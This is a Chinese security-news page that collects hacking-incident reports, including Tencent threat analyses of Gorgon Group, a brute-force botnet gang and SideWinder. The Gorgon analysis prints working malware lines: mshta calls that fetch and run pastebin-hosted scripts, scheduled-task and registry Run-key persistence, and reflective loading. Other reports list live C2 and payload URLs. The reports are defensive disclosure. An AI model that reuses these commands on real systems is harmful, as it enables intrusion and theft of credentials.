分类: 黑客事件

B 站 500 万粉 up 主党妹被黑客勒索 专家表示无解

日前,在B站拥有超500万粉丝的UP主“机智的党妹”发布视频称,自己遭到了黑客的病毒“勒索”,需要交钱才能赎“人”!她表示自己正在制作的数百GB的视频素材文件,全部被病毒加密绑架,黑客只留下一封勒索信:想拿回这些素材?乖乖交赎金吧。并且,有网络安全专家表示,当下对这种勒索病毒无能为力。 最新公开数据显示,出去B站UP主排行中前三的官方账号,党妹在百大UP主排名第十。比李子柒、郭杰瑞等平台外同样大火的UP主人气还高。 据党妹介绍,此前团队的素材文件都放在本地电脑硬盘中,但后期由于视频剪辑及渲染素材过大,团队花费了十几万元在内部搭建了一个NAS系统,相当于公司团队内部的公共硬盘。 但让人想不到的是,在NAS盘搭建好,并测试一段时间后,在投入使用的第一天就遭遇到了勒索病毒。团队内部的IT人员经过调查后,发现黑客使用的一种叫做Buran的勒索病毒。 文件被攻击之后,NAS盘里面文件的格式全部被改成了奇怪的格式。黑客并在其中留下了一封.txt格式得勒索信,其上称,文件已被加密,唯一恢复办法是购买独一无二的密匙。同时,在信中留下了一串ID,通过给这两个特定邮箱取得联系。 此外,值得注意的是,黑客还提醒被攻击者,不要使用第三方解密和重命名这些文件,如果解密成本增加,还将收取更高的赎金。同时,黑客还提醒被攻击者,不要尝试第三方解密,否则可能会被第三方继续骗。 而对于此类勒索病毒,有腾讯安全专家表示,很不幸,对大多数勒索病毒攻击,是没有修复解密的办法的,这也是勒索病毒产业持续危害数年的原因。   (稿源:快科技,封面源自网络。)

苹果公司:无证据表明黑客可利用邮件漏洞进行攻击

据外媒报道,苹果公司表示,目前没有任何证据表明网络攻击者可以利用iPhone和iPad邮件(Mail)应用程序中的新漏洞进行黑客攻击。此次发现漏洞的Mail应用在全球可能有超过10亿用户。 苹果公司正在反驳网络安全公司ZecOps的说法。ZecOps称,苹果的软件缺陷为黑客潜入iPhone及其他iOS设备中提供了可能,且这一漏洞已经存在了一年之久。苹果公司发起了一项调查,并在一份声明中表示,Mail问题本身并不足以让网络攻击者绕过苹果内置的安全机制。同时,苹果公司补充说,它将很快发布一个补丁。 苹果公司表示:“我们已经彻底调查了研究人员的报告,并根据所提供的信息得出结论,这些问题不会对我们的用户构成直接的风险。研究人员在Mail中发现了三个问题,但仅凭这些漏洞并不足以让黑客绕过iPhone和iPad的安全保护,目前我们还没有发现任何证据表明它们可以被用来攻击苹果用户的隐私。” 总部位于旧金山的ZecOps上周五对苹果的否认做出了回应,重申它发现的漏洞确实被“一些组织”利用了。ZecOps公司在一份声明中对苹果的新补丁表示了感谢,同时宣称将在补丁发布之后“更新更多信息”。 上周三,ZecOps发布了关于漏洞的报告。报告称,当iPhone或iPad在Mail应用程序上打开一封经过特别设计的电子邮件时,网络攻击者就可以利用这些漏洞。ZecOps公司在报告中称,这一漏洞已经被“一个高级威胁的运营商”用于实施攻击了。ZecOps公司表示,遭到网络攻击的用户中有“来自北美财富500强企业的个人”、“日本一家航空公司的高管”以及“欧洲的一名记者”。 据ZecOps称,网络攻击者可能从2018年1月就开始利用这些漏洞了。ZecOps预测,当苹果发布beta版更新时,这些漏洞会被公开披露,而网络攻击者“很可能会利用这段时间,在补丁发布之前攻击尽可能多的设备”。   (稿源:新浪科技,封面源自网络。)

收到“订单、付款收据、分析报告”PPT,请勿打开,为Gorgon Group黑客组织投递的攻击邮件

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/Td6zdGxeOjKEh3nu-vAGdw 一、背景 近期腾讯安全威胁情报中心检测到多个企业受到以PPT文档为诱饵文档的钓鱼邮件攻击。这些钓鱼邮件投递的PPT文档包均含恶意宏代码,宏代码会启动mshta执行保存在pastebin上的远程脚本代码,且pastebin URL是由Bitly生成的短链接。 此次攻击的主要特点为恶意代码保存在托管平台pastebin上:包括VBS脚本、Base64编码的Powershell脚本以及经过混淆的二进制数据。攻击者在后续阶段会通过计划任务下载RAT木马,然后将其注入指定进程执行,RAT会不定期更换,当前获取的RAT 木马是Azorult窃密木马。 对比分析发现,攻击者注册的pastebin账号为”lunlayloo”( 创建于2019年10月),与另一个账号“hagga”(创建于2018年12月)对应攻击事件中使用的TTP高度相似,因此我们认为两者属于同一家族ManaBotnet,并且”lunlayloo”可能为“hagga”的后继者。 有安全厂商分析认为Pastebin账号“hagga”发起的攻击活动有可能来自组织Gorgon Group,一个疑似来自巴基斯坦或与巴基斯坦有关联的黑客组织。该组织已进行了一系列非法行动和针对性攻击,包括针对英国、西班牙、俄罗斯和美国的政府组织的攻击。 Manabotnet攻击流程 二、详细分析 初始攻击以PPT文档为诱饵,使用的文件名有“SHN FOODS ORDER.ppt”、“PrivateConfidential.ppt”、“Analysis Reports.ppt”、“Order001.ppt”、“payment_receipt.ppt”,邮件主题为Analysis Reports From IDS Group(来自IDS Group的分析报告 )、Analysis Reports From NHL – Nam Hoang Long Co.,Ltd(来自NHL公司的分析报告)、Purchase Order2020(2020采购订单)、payment_receipt.ppt(付款收据)等。 Analysis Reports.ppt中包含恶意的VBA宏代码。 如果用户选择启用宏,则会执行命令: `mshta https[:]//j.mp/ghostis61hazsba` 远程代码URL是短链接,还原为https[:]//pastebin.com/raw/FssQ8e8e,恶意代码被保存在托管平台pastebin.com。 以同样方式投递的文档SHN FOODS ORDER.ppt中的宏执行的恶意代码为,https[:]//j.mp/ghjbnzmxc767zxg,短链接还原得到https[:]//pastebin.com/raw/RCd2CLNd,该地址的托管恶意代码页面如下: 通过浏览器的调试功能对该代码进行编码转换可得到VBScript代码: 该代码加入了一些字符反转和字符连接操作,以逃避恶意代码检测,然后执行5个操作进行持久化: 1.创建计划任务“Murtaba”,每80分钟运行一次远程hta脚本; 2.执行一次hta脚本; 3.在注册表HKCU\Software\Microsoft\Windows\CurrentVersion\Run\BACKup2下写入执行hta脚本的命令; 4.在注册表HKCU\Software\Microsoft\Windows\CurrentVersion\Run\BACKup3下写入执行hta脚本的命令; 5.在注册表HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce\中写入执行hta脚本的命令。 `CreateObject(“WScript.Shell”).Run StrReverse(“/ 08 om/ ETUNIM cs/ etaerc/ sksathcs”) + “tn ““Murtaba”” /tr ““\”“&` `CreateObject(“WScript.Shell”).Run “””mshta”””“http:\\pastebin.com\raw\B7f3BpDk”“”` `CreateObject(“WScript.Shell”).RegWrite “HKCU\Software\Microsoft\Windows\CurrentVersion\Run\BACKup2”, “””m” + “s” + “h” + “t” + “a”””“http:\\pastebin.com\raw\eMse7spS”“”, “REG_SZ”` `CreateObject(“WScript.Shell”).RegWrite “HKCU\Software\Microsoft\Windows\CurrentVersion\Run\BACKup3”, “””m” + “s” + “h” + “t” + “a”””“http:\\pastebin.com\raw\hxKddkar”“”, “REG_SZ”` `CreateObject(“WScript.Shell”).RegWrite “HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce\”, ““”m” + “s” + “h” + “t” + “a“”””http:\\pastebin.com\raw\v2US1QAY”””, “REG_SZ”` 在计划任务中指定执行的远程hta脚本均https[:]\\pastebin.com\raw\B7f3BpDk,解码为以下文本,同样是一段VBScript代码,在其中以隐藏的方式执行Powershell,首先通过ping google.com测试网络是否连通,然后下载Powershell脚本https[:]//pastebin.com/raw/8ZebE1MG进行base64解码并执行。 计划任务执行的Pastebin保存的VBScript脚本: VBScript通过Powershell执行Pastebin保存的以base64编码的Powershell脚本: Base64解码后: Powershell代码将一个压缩包文件的二进制数据以硬编码形式进行保存,使用时首先将“!”替换为“0x”去除混淆,然后通过IO.MemoryStream将数据读取到内存,最后再使用IO.Compression.GzipStream进行解压,就可以获得一个以.Net编写的DLL并通过Reflection  加载执行: $t=[System.Reflection.Assembly]::Load($decompressedByteArray); Powershell获取的另一个PE直接保存了二进制编码在pastebin的URL(https://pastebin.com/raw/f9c50ewQ)上,使用时首先将‘T_B’替换为‘0x’,在分析过程中发URL被动态更换为了:https://pastebin.com/raw/EmyvkN6m,使用时将“^^_^^”替换为“0x”,还原得到PE文件后,将其注入到notepad.exe的内存中执行: [Givara]::FreeDom(‘notepad.exe’,$Cli2)  https[:]//pastebin.com/raw/f9c50ewQ https[:]//pastebin.com/raw/EmyvkN6m .NET编写的DLL名为Apple.dll,入口调用Fuck.FUN,Fuck.FUN随后启动记事本,掏空现有部分的映射,在记事本进程中分配一个新的缓冲区,向该进程中写入有效负载,然后继续执行线程。这样使得攻击者无需将恶意软件写入磁盘,通过计划任务可定期获取注射器(一段攻击代码,用来将RAT注入其他程序)和RAT,并将RAT注入指定进程的内存中执行。 当前作为Payload被下载执行的是Azorult木马,一种使用Delphi编写的窃密木马变种。Azorult已在俄罗斯论坛上出售,价格最高为100美元。 Azorult窃密木马的大多数功能是获取可以在受害者计算机上找到的各类账号密码,例如,电子邮件帐户,通信软件(例如pidgin、 psi+,、telegram),Web Cookie,浏览器历史记录和加密货币钱包,同时该木马还具有上载和下载文件以及截屏的功能。 三、团伙分析 攻击者使用第三方网站(例如Bitly,Blogspot和Pastebin)可能是为了逃避检测,因为这些网站不会被网络防御方判断为恶意网站。但是,诸如Bitly和Pastebin之类的网站会记录访问某个链接的次数。我们能够确定是谁创建了此Pastebin帖子,并统计该链接被访问了多少次。 例如,从页面可以看到托管“Apple.dll”样本的URL已被查看12000多次。这表明有12000台计算机受此攻击影响。但是,由于攻击者使用的是已知的RAT木马,因此实际受影响的计算机数量可能会少得多,因为许多计算机可能已安装了杀毒软件。 “lunlayloo”在2020年3月30日上传的恶意代码,该账户创建于2019年10月23日。 lunlayloo在2020年4月21日上传的恶意代码,托管“Azorult Rat”,由于最近才更新,被查看只有77次。 分析时发现攻击Azorult Rat回传数据对应的URL为: http[:]//23.247.102.120/manabotnet-work/index.php 该URL中包含的“manabotnet”与另一安全公司发现的Pastebin帖子标题:“ MasterManabots-all-bots”相同,该攻击者的Pastebin账号名称为“hagga”,于2018年12月3日创建,另外由于两次攻击使用的TTP高度相似性,所以我们认为他们属于同一家族ManaBots。   unit42在2019年4月对Pastebin账号“HAGGA”发起的攻击活动进行了详细的分析,基于高水平的TTP,包括使用RevengeRAT,unit42认为其与Gorgon Group组织有关。 (https[:]//unit42.paloaltonetworks.com/aggah-campaign-bit-ly-blogspot-and-pastebin-used-for-c2-in-large-scale-campaign/) 2019年1月腾讯安全御见威胁情报中心也捕获到疑似来自Gorgon Group组织相关的攻击,)(https[:]//www.freebuf.com/column/193603.html),该攻击以“订单”、“支付详单”等主题的钓鱼邮件针对全球的外贸人士进行攻击,行为类似于腾讯安全威胁情报中心多次披露的”商贸信”,攻击者使用blogspot的订阅功能来保存恶意代码。 综合分析以上几次攻击行动,总结该团伙攻击对应的ATT&CK矩阵对应如下,共涉及约44个TTP技术: Initial Access(初始攻击) T1193 Spearphishing Attachment Execution(执行) T1106 Execution through API T1129 Execution through Module Load T1203 Exploitation for Client Execution T1170 Mshta T1086 PowerShell T1053 Scheduled Task T1064 Scripting T1127 Trusted Developer Utilities Persistence(持久化) T1060 Registry Run Keys / Startup Folder T1053 Scheduled Task Privilege Escalation(权限提升) T1055 Process Injection T1053 Scheduled Task Defense Evasion(防御逃逸) T1140 Deobfuscate/Decode Files or Information T1143 Hidden Window T1170 Mshta T1027 Obfuscated Files or Information T1093 Process Hollowing T1055 Process Injection T1064 Scripting T1127 Trusted Developer Utilities T1102 Web Service Credential Access(凭证获取) T1503 Credentials from Web Browsers T1081 Credentials in Files T1214 Credentials in Registry T1539 Steal Web Session Cookie Discovery(数据发现) T1083 File and Directory Discovery T1012 Query Registry T1518 Software Discovery T1082 System Information Discovery T1007 System Service Discovery Collection(数据采集) T1123 Audio Capture T1119 Automated Collection T1115 Clipboard Data T1213 Data from Information Repositories T1005 Data from Local System T1039 Data from Network Shared Drive T1074 Data Staged T1056 Input Capture T1185 Man in the Browser T1113 Screen Capture T1125 Video Capture Command and Control(命令和控制) T1094 Custom Command and Control Protocol T1024 Custom Cryptographic Protocol T1132 Data Encoding T1001 Data Obfuscation T1219 Remote Access Tools T1105 Remote File Copy T1102 Web Service Exfiltration(数据窃取) T1022 Data Encrypted T1041 Exfiltration Over Command and Control Channel 其中具有该团伙的代表性的TTP技术点为: T1170 Mshta T1086 PowerShell T1053 Scheduled Task T1060 Registry Run Keys / Startup Folder T1093 Process Hollowing T1055 Process Injection T1102 Web Service 在T1102 Web Service技术上,该团伙经常使用的合法外部Web服务为Bitly、Blogspot和Pastebin,这个技术在ATT&CK矩阵中战术条目中同时属于Defense Evasion(防御逃逸)和Command and Control(命令和控制),在具体攻击过程中体现在可以绕过恶意网址检测,以及可以通过修改托管网站上的URL对应的内容动态控制下载的恶意代码。 四、安全建议 Gorgon Group为专业黑客组织,擅长攻击大型企业、行业及政府背景的机构,腾讯安全威胁情报中心推荐相关单位采用腾讯安全完整解决方案提升系统安全性,防止专业黑客的攻击。 IOCs Md5 417eef85b7545b13cb2a5b09508a9b8a cd425ac433c6fa5b79eecbdd385740ab f4479c5553271402ab4ff9a55584a9fd URL http://23.247.102.120/manabotnet-work/index.php 短链接: https[:]//j.mp/ghjbnzmxc767zxg https[:]//j.mp/hdjas6782vnavx https[:]//j.mp/dhajsk67a8sdg https[:]//j.mp/ahjkads78dasa https[:]//j.mp/hdajks6786sa https[:]//j.mp/dbashgdyt23vb Pastebin https[:]//pastebin.com/raw/8ZebE1MG https[:]//pastebin.com/raw/FssQ8e8e https[:]//pastebin.com/raw/RCd2CLNd https[:]//pastebin.com/raw/f9c50ewQ https[:]//pastebin.com/raw/EmyvkN6m https[:]//pastebin.com/raw/B7f3BpDk https[:]//pastebin.com/raw/eMse7spS https[:]//pastebin.com/raw/hxKddkar https[:]//pastebin.com/raw/v2US1QAY 参考链接 https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/ https://www.freebuf.com/column/193603.html

任天堂确认 16 万个 Nintendo Accounts 在黑客入侵中被获取

任天堂正在禁用通过任天堂网络ID(NNID)登录Nintendo Accounts的方式,这是因为此前已有16万个账户受到黑客攻击企图的影响。任天堂表示,自4月初以来,“通过我们的服务以外的其他一些手段非法获得的登录ID和密码已经被用于访问这些账户。” 包含账户昵称、出生日期、国家和电子邮件地址等信息都可能在此次漏洞事件中被访问,部分账户还遭遇欺诈性购买。 任天堂现在建议所有用户启用双因素验证,受影响的账户的密码现在正在重置,这些旧的NNNID哦通常用于3DS和Wii U设备。任天堂最新的Switch游戏机使用了更新后的任天堂账户系统,但直到今天为止,这些旧的账户都可以继续访问新账户系统。 受影响的用户也将通过电子邮件通知,该公司警告说,如果你使用了相同的NNID和任天堂账户的密码,那么“你的余额和注册的信用卡/PayPal可能会在‘我的任天堂商店’或任天堂网店被非法使用。” 本周早些时候的媒体报道称,一些任天堂账户被破解,不少人利用这一账户购买数字项目,如 Fortnite VBucks 捆绑的数字项目。任天堂正在要求受影响的用户联系该公司,以便它可以调查购买历史,并取消购买。   (稿源:cnBeta,封面源自网络。)

谷歌警告黑客正在利用免费快餐诱骗联邦政府工作人员

根据谷歌周三发布的一份报告,黑客正在寻找一切机会来利用本次 COVID-19 的全球大流行,甚至通过免费快餐来诱骗政府官员泄露登录信息。这家科技巨头表示,其日均在阻止 1800 万封恶意邮件,这还不包括与新冠病毒有关的 2.4 亿封垃圾邮件。 此外谷歌威胁分析小组表示,其已发现有十余个有背景的黑客组织,称其正在利用 COVID-19 来引诱受害者点击恶意链接。 这些攻击与其它类型的网络犯罪有些不同,通常出于间谍目的、而不是为了获取更直接的经济利益。 比如谷歌指出,其发现了一项针对美国政府雇员的行动,通过提供美国快餐连锁店优惠券和免费餐食的形势引诱受害者上钩。 此类骗局常涉及与 COVID-19 有关的消息,以引导受害者进入一个伪装成送餐安排的网站页面,只为了窃取政府雇员的谷歌账户登录凭据。 谷歌威胁分析小组负责人 Shane Huntley 在一篇文章中称,目前尚不清楚有哪些用户的账户受到了侵害,但像往常一样,他们会向这类用户发出警告通知。 除了特别针对美国政府雇员的快餐钓鱼诈骗,本次新冠病毒流行期间,黑客还向除南极洲外的许多地区发起了邮件诈骗,比如伪装成世界卫生组织的官方网站。 好消息是,谷歌表示,其正在为包括世界卫生组织在内的 5 万多个账户给予额外的安全防护。   (稿源:cnBeta,封面源自网络。)

疫情期间美国 IC3 网络犯罪报告量激增 每天接到 3000-4000 起

自新冠病毒疫情在美国蔓延以来,联邦调查局的网络犯罪投诉中心(IC3)接到的网络犯罪举报量激增,主要是因为美国国内和国际黑客试图在这个时间段进行各种网络攻击活动。 美国联邦调查局网络部副助理主任托尼娅·乌戈雷茨(Tonya Ugoretz)周四表示,IC3每天收到3000-4000起网络安全投诉,而在疫情爆发之前每天收到的投诉量维持在1000起左右。 本周四由Aspen Institute主办的网络研讨会上,乌戈雷茨表示:“我们的网络漏洞越来越多,也增加了威胁者利用这些漏洞的兴趣。” 乌戈雷茨表示许多黑客来自于那些“渴望深入了解”新冠肺炎相关研究的国家,而“远程工作的快速转变”已经为黑客提供了大量供他们利用的网络漏洞。 乌戈雷茨提到:“各国对有关病毒的信息非常感兴趣,例如关于疫苗的信息。我们的确发现有侦察活动,一些攻入那些机构的行为,尤其是那些公开表示自己在研究新冠肺炎的机构。” 乌戈雷茨称,研究潜在疗法或疫苗的机构公开宣传自己在做这件事情是合情合理的。但是她指出,“不好的一面是,这会让他们成为其他有兴趣搜集研究细节的国家的目标,这些国家甚至可能会窃取这些机构的知识产权信息。”她表示,FBI发现,这些由国家支持的黑客组织也试图攻入美国医疗保健系统。   (稿源:cnBeta,封面源自网络。)

警惕某黑产团伙针对 Windows/Linux 双平台的批量抓鸡行动,已有上千台服务器失陷

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/zFW8Niekso7uVCyOjoMn2w 一、概述 近期腾讯安全威胁情报中心发现一黑产团伙通过多种自动化扫描爆破工具攻击Windows/Linux服务器,攻击者使用的爆破工具包括ssh/mysql/rdp等多种爆破工具,爆破成功后会在windows/Linux平台植入后门。腾讯安全威胁情报中心在攻击者的HFS服务器上发现3个攻击载荷,包括2个针对Linux系统的DDoS僵尸网络木马billgates及一个针对windows系统的后门窃密木马。 攻击载荷服务器 该黑产团伙的主要特点: 1.针对windows/Linux双平台的攻击载荷都是通过生成器生成,可配置上线地址,自动化、专业化程度高。 2.入侵手段主要是通过多种自动化扫描爆破工具包进行扫描爆破,包括3306/1433端口(mysql/sqlServer默认端口)、3389端口(远程桌面)、SSH爆破等等。 3.通过一键免杀工具进行免杀,通过代理频繁更换服务器IP躲避追踪,频繁更换HFS服务器上的文件,使点击量重新计数等方式躲避追踪查杀。 4.攻击载荷针对Linux系统的是DDoS僵尸网络木马billgates,针对windows系统的为后门窃密类木马。 该黑产团伙从四月份开始活跃,目前已有上千台主机失陷,失陷主机分布在全国各地,排名前三的省份为浙江、江苏、广东。 受该团伙攻击失陷的服务器分布 二、黑客攻击工具包分析 腾讯安全威胁情报中心的检测数据显示,攻击载荷同一台机器上的IP地址每天都会修改更换一个。该黑产团伙为了躲避追踪,用了代理工具频繁修改IP地址,所使用的域名xnsj.f3322.net近期被解析指向的多个IP,实际上也是同一台机器设备: 我们在这台HFS服务器上发现多个黑客工具包,包括3389抓鸡工具包、 红尘网安1433工具包,Linux爆破工具、3306抓鸡、SA弱口令、1433扫描工具、 一键免杀工具、 Linux/win平台生成器、DDoS压力测试工具等等。 部分黑客工具包及说明: 黑客工具包对应的功能 3389抓鸡工具包为远程桌面爆破工具,内置了爆破密码字典: 红尘网安1433工具包及3306工具包主要是针对mysql及sqlsver进行弱密码爆破: DDoS压力测试工具 三、Billgates僵尸网络木马分析 该团伙针对攻陷的Linux服务器会安装Billgate僵尸网络木马,Billgates僵尸网络最早出现在2014年,是最为活跃的僵尸网络家族之一,曾多次被安全厂商披露,在本案例中Billgates bot通过生成器生成,可配置ip/域名及端口。 Billgates bot生成器 持久化配置 Billgates Bot在多个目录创建了自启动脚本及文件。包括在自启动目录init.d创建自启动脚本。 DbSecuritySpt及在rc.d多个目录创建了自启动项 创建的自启动项: DDoS攻击 在函数MainProcess中完成主要的DDoS攻击功能,包括Tcp/Udp/Syn洪水攻击,DNS反射攻击等。 完整的攻击类型如下: MainProcess函数DDoS功能: 四、针对Windows平台的后门分析 该黑产团伙投放的Windows平台后门木马,也是通过生成器生成,可配置C2上线地址,监听端口,及标识码。 此外还可以选择是否加UPX壳及是否添加到开机自启动(默认添加)。 有后门类木马的几乎所有功能,包括键盘记录嗅探,文件下载、上传、执行,执行CMD命令等等。 目前其C2地址为116.207.21.252|xnsj.f3322.net:1999 功能函数: 五、安全建议 1.针对Linux平台的排查:可通过排除相关启动项查看是否中招,如果有包含 /etc/rc.d/init.d/DbSecuritySpt等自启动项则表示已经中招,建议网管及时清除。 2.推荐企业用户使用腾讯T-Sec终端安全管理系统(御点)查杀该团伙安装的Windows系统后门木马;   3.建议网管使用高强度密码,并经常更换,避免遭遇爆破入侵。推荐企业用户部署适当的腾讯安全完整解决方案提升系统安全性。 IOCs: MD5: 488d0393825b9d4aeebd30e236020d78 e133a6078a38e983c1a7a3fb14670c63 fe642d12ef1f884395a3bfd501949ebf b21f8aa2d18cb64b779161d475b68209 7145110d75992a0f0ab2332293fb73ab b4caaea9a5621a595d051da143b40015 935c5a016862605b9d62564c3acdb2aa 544344fb1410184109f85e6343bf0e15 4363993917d8386de4a4d07b4a1f70de 49ec29cab36ccf726c8c25f7aca6875c be89d31b7d876bc6058bd8e64f88c9e1 IP 116.207.21.252 111.176.102.38 116.207.16.45 111.176.101.97 域名: xnsj.f3322.net

响尾蛇(SideWinder)APT组织使用新冠疫情为诱饵的攻击活动分析

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/yxUTG3Qva169-XiYV0pAyQ   一、背景介绍 伴随新冠疫情在全球范围的爆发,疫情的动态资讯成为我们每天必会定接触到的外界信息,在这种大环境下,我们对疫情主题相关的推送信息警惕性会相对变低。而善于浑水摸鱼,披狼皮装羊的APT组织自然不会放过这种增热点的机会,以“新冠疫情”为主题的APT攻击活动从2月份起就持续不断。 最近,腾讯安全威胁情报中心就捕获到了一起响尾蛇(SideWinder)APT组织以新冠疫情为主题针对巴基斯坦军方的攻击活动。 响尾蛇(SideWinder)是腾讯安全威胁情报中心最早在2018年披露的APT攻击组织,该组织最早的攻击活动可以追溯到 2012 年。该组织主要针对巴基斯坦、中国大陆的政府、军工、军事目标等进行攻击活动。攻击武器库包括PC端、移动端等。 二、技术分析 本次攻击的诱饵为一个名为Pak_Army_Deployed_in_Country_in_Fight_Against_Coronavirus.pdf.lnk的快捷方式文件: 该lnk文件的基本属性 诱饵的生成时间和其他属性 可以看到攻击者的诱饵生成时间为2019年的6月19日,在vmware虚拟机生成。 执行快捷方式后,会从http://www.d01fa.net/images/D817583E/16364/11542/f2976745/966029e下载hta文件并且执行。 下载回来的hta会对受害设备上的.NET进行版本检测,删除除了V2和V4以外的版本,还通过shell指令指定执行的版本,此外,样本之后释放的的rekeywiz.exe.config配置文件目的与之相同,均为防止不同.NET版本之前出现兼容性问题。 除了对受害设备.NET版本进行版本选择之外,HTA文件还会对设备上的杀软进行检测: 之后,会创建一个HTA实例,通过url下载第二个HTA文件并将之执行,同时释放命名为“Pak_Army_Deployed_in_Country_in_Fight_Against_Coronavirus.pdf”的PDF诱饵文档: 释放的诱饵文档为: 可以看到,诱饵内容跟新冠疫情、巴基斯坦军方相关。 第二个HTA文件其数据解密方式,以及总体框架与第一个HTA文件相同,主要功能是在C:\ProgramData\创建了一个fontFiles文件夹(包含释放的四个文件:Duser.dll、rekeywiz.exe、rekeywiz.exe.config、SOHYXY.tmp),利用rekeywiz.exe白文件加载Duser.dll黑文件。该白加黑的手法也是SideWinder惯用伎俩。其中TMP文件的文件名为随机字符: Duser.dll为一个加载器,主要目的是对之前释放的SOHYXY.tmp文件进行简单的异或解密,然后进行加载: 解密后的SystemApp.dll文件,是为最终释放的RAT。 该RAT的功能跟之前的类似,包括信息收集、文件上传等。 如对用户信息、设备信息、网卡信息、已安装杀软的信息、磁盘驱动设备信息、设备已安装进程信息等进行窃取、收集: 文件上传途径有两种,对应RAT在配置模块中的两个等待上传的文件列表,C2通过下发指令修改配置模块,实现对所有文件或指定文件的上传。文件上传: 对C2的下发指令进行分析,可得出以下指令集: RAT会在fontFiles文件夹中新建名为“font”的文件,用于保存C2下发的指令,但指令是经过加密的,经过解密之后,可查看指令明文,而每一次指令下发,原指令数据都会被覆盖,生成新的font文件。 三、关联分析 除了发现的以“新冠疫情”为主题的样本以外,我们还发现了SideWinder(响尾蛇)的多个其他攻击活动。 如Additional_CSD_Rebate.pdf.lnk,以向退役军人发放csd回扣卡为主题的进行钓鱼活动: 诱饵文件除了lnk之外,还有使用office漏洞的攻击,如 但是最终执行的payload都大同小异,就不再赘述。 四、安全建议 1、建议重要机构网管培训工作人员不要随意打开不明来源的邮件附件,在邮件目的及发件人均未知的情况下,建议不要访问附件。 2、建议企业用户使用腾讯T-Sec终端安全管理系统(御点)修补漏洞,及时安装系统补丁,可减少被漏洞攻击的风险,同时注意打开Office文档时,避免启用宏代码。 3、推荐企业用户部署腾讯T-Sec高级威胁检测系统(御界)对黑客攻击行为进行检测。 腾讯T-Sec高级威胁检测系统,是基于腾讯安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统,该系统可及时有效检测黑客对企业网络的各种入侵渗透攻击风险。参考链接:https://cloud.tencent.com/product/nta 五、附录 1、IOCs 3c9f64763a24278a6f941e8807725369 40fd59323c3883717faca9424b29b9aa 3e0c08851aafbca17dda7ce54ba52cb9 1aa880affbd363401e1a25c07ad1ef1e 95413052d03971654687d8508a6a32e9 7a4f9c2e5a60ec498c66d85d2df351e8 120e3733e167fcabdfd8194b3c49560b 7442b3efecb909cfff4aea4ecaae98d8 bfad291d000b56ddd8a331d7283685b2 fef12d62a3b2fbf1d3be1f0c71ae393e 58363311f04f03c6e9ccd17b780d03b2 9b1d0537d0734f1ddb53c5567f5d7ab5 URL https://cloud-apt.net/202/AEETLbHd0DGh9r86lU6CFOCttbakx5vMmEGfKLTP/16364/11542/9c8ea254 https://www.d01fa.net /202/AEETLbHd0DGh9r86lU6CFOCttbakx5vMmEGfKLTP/16364/11542/9c8ea254 http://www.d01fa.net/plugins/16364/11542/true/true/ http://cloud-apt.net /plugins/16364/11542/true/true/ http://www.d01fa.net/cgi/8ee4d36866/16364/11542/58a3a04b/file.hta http://cloud-apt.net /cgi/8ee4d36866/16364/11542/58a3a04b/file.hta http://www.d01fa.net/images/D817583E/16364/11542/f2976745/966029e http://www.fdn-en.net/images/0B0D90AD/-1/2418/9ccd0068/9d68236 http://www.nrots.net/images/5328C28B/15936/11348/7c8d64e9/e17e25e http://ap-ms.net/202/M2qIMRE6Wu5W0pgsgYpzoKzlzclgtHbcLzhudKaF/-1/12571/d2d06434 https://www.sd1-bin.net/images/2B717E98/-1/12571/4C7947EC/main.file.rtf https://reawk.net/202/jQcPZ3kx6hGod25WMnTocKStUToZEPRy6WfWkEX3/-1/12571/87854fea 2、参考链接 https://s.tencent.com/research/report/799.html https://s.tencent.com/research/report/659.html https://mp.weixin.qq.com/s/CZrdslzEs4iwlaTzJH7Ubg  

旧金山国际机场证实其网站遭黑客入侵 员工密码或遭窃取

旧金山国际机场已确认,其两个网站在3月份被黑客入侵,攻击者似乎已经访问了其员工和承包商的用户名和密码。该机场在4月7日的一份通知中证实,SFOConnect.com和SFOConstruction.com这两个网站是 “网络攻击的目标”,黑客在这两个网站上 “插入了恶意的计算机代码,以窃取一些用户的登录凭证”。如果被窃取,这些登录凭证可能会让攻击者进入机场的网络。目前还不知道是否有任何额外的保护措施,如多因素认证等,以防止网络漏洞。 该通知还补充说:”用户可能会受到这次攻击的影响,包括那些通过基于Windows操作系统的个人设备或非机场维护的设备从机场网络以外的Internet Explorer访问这些网站的用户。” 通知称,机场于3月23日将员工专用网站下线,并发布了强制重置密码的通知。现在两个网站都已恢复运行。 旧金山国际机场的发言人没有立即发表评论。 攻击者利用现有的漏洞在网站上注入代码以获取输入的数据,如用户名和密码甚至信用卡信息等,这种情况并不罕见。 两年前,英国航空的网站上有38万名客户的信用卡记录被黑客在其网站和移动应用上注入恶意代码,导致38万名客户的信用卡记录被盗取。这次攻击导致了欧洲历史上最大的数据泄露罚款–约2.3亿美元–这要归功于当时新出台的GDPR法规。   (稿源:cnBeta,封面源自网络。 )

黑客劫持微软公司的数个 YouTube 帐户 以传播加密庞氏骗局

外媒ZDNet从一位读者那里了解到,黑客已经劫持了微软公司的一些YouTube帐户,并向该公司的订阅用户广播了一种加密货币庞氏骗局。根据消息来源,这些黑客入侵似乎发生在当地时间周一。尽管向YouTube工作人员报告了这些情况,但截至外媒记者发稿前,被劫持的帐户仍在直播。 这位黑客目前正在直播前微软首席执行官比尔·盖茨(Bill Gates)在2019年6月在Village Global向听众提供有关创业公司建议的旧演讲。黑客正在直播演示文稿的变更版本,同时还要求观众参加经典的“加密货币赠品”活动-受骗者可能发送少量加密货币以使收入翻倍,但从未获得任何回报。 目前,加密货币庞氏骗局正在Microsoft US,Microsoft Europe,Microsoft News等YouTube帐户上实时流式传输。目前,YouTube上有超过19个直播视频正在直播。这些视频不仅在微软YouTube频道上播放,而且还在从其他用户手中劫持并重命名为合法Microsoft帐户的YouTube频道上播放,以扩大效果。 视频流中列出的比特币地址未收到任何交易或持有任何资金,表明没有用户落入该骗局。根据YouTube的统计信息,目前有成千上万的人观看了视频。 微软并不是受到大规模黑客入侵事件影响的唯一组织。著名的德国黑客社区Chaos Computer Club也被劫持以传播类似消息。   (稿源:cnBeta,封面源自网络。)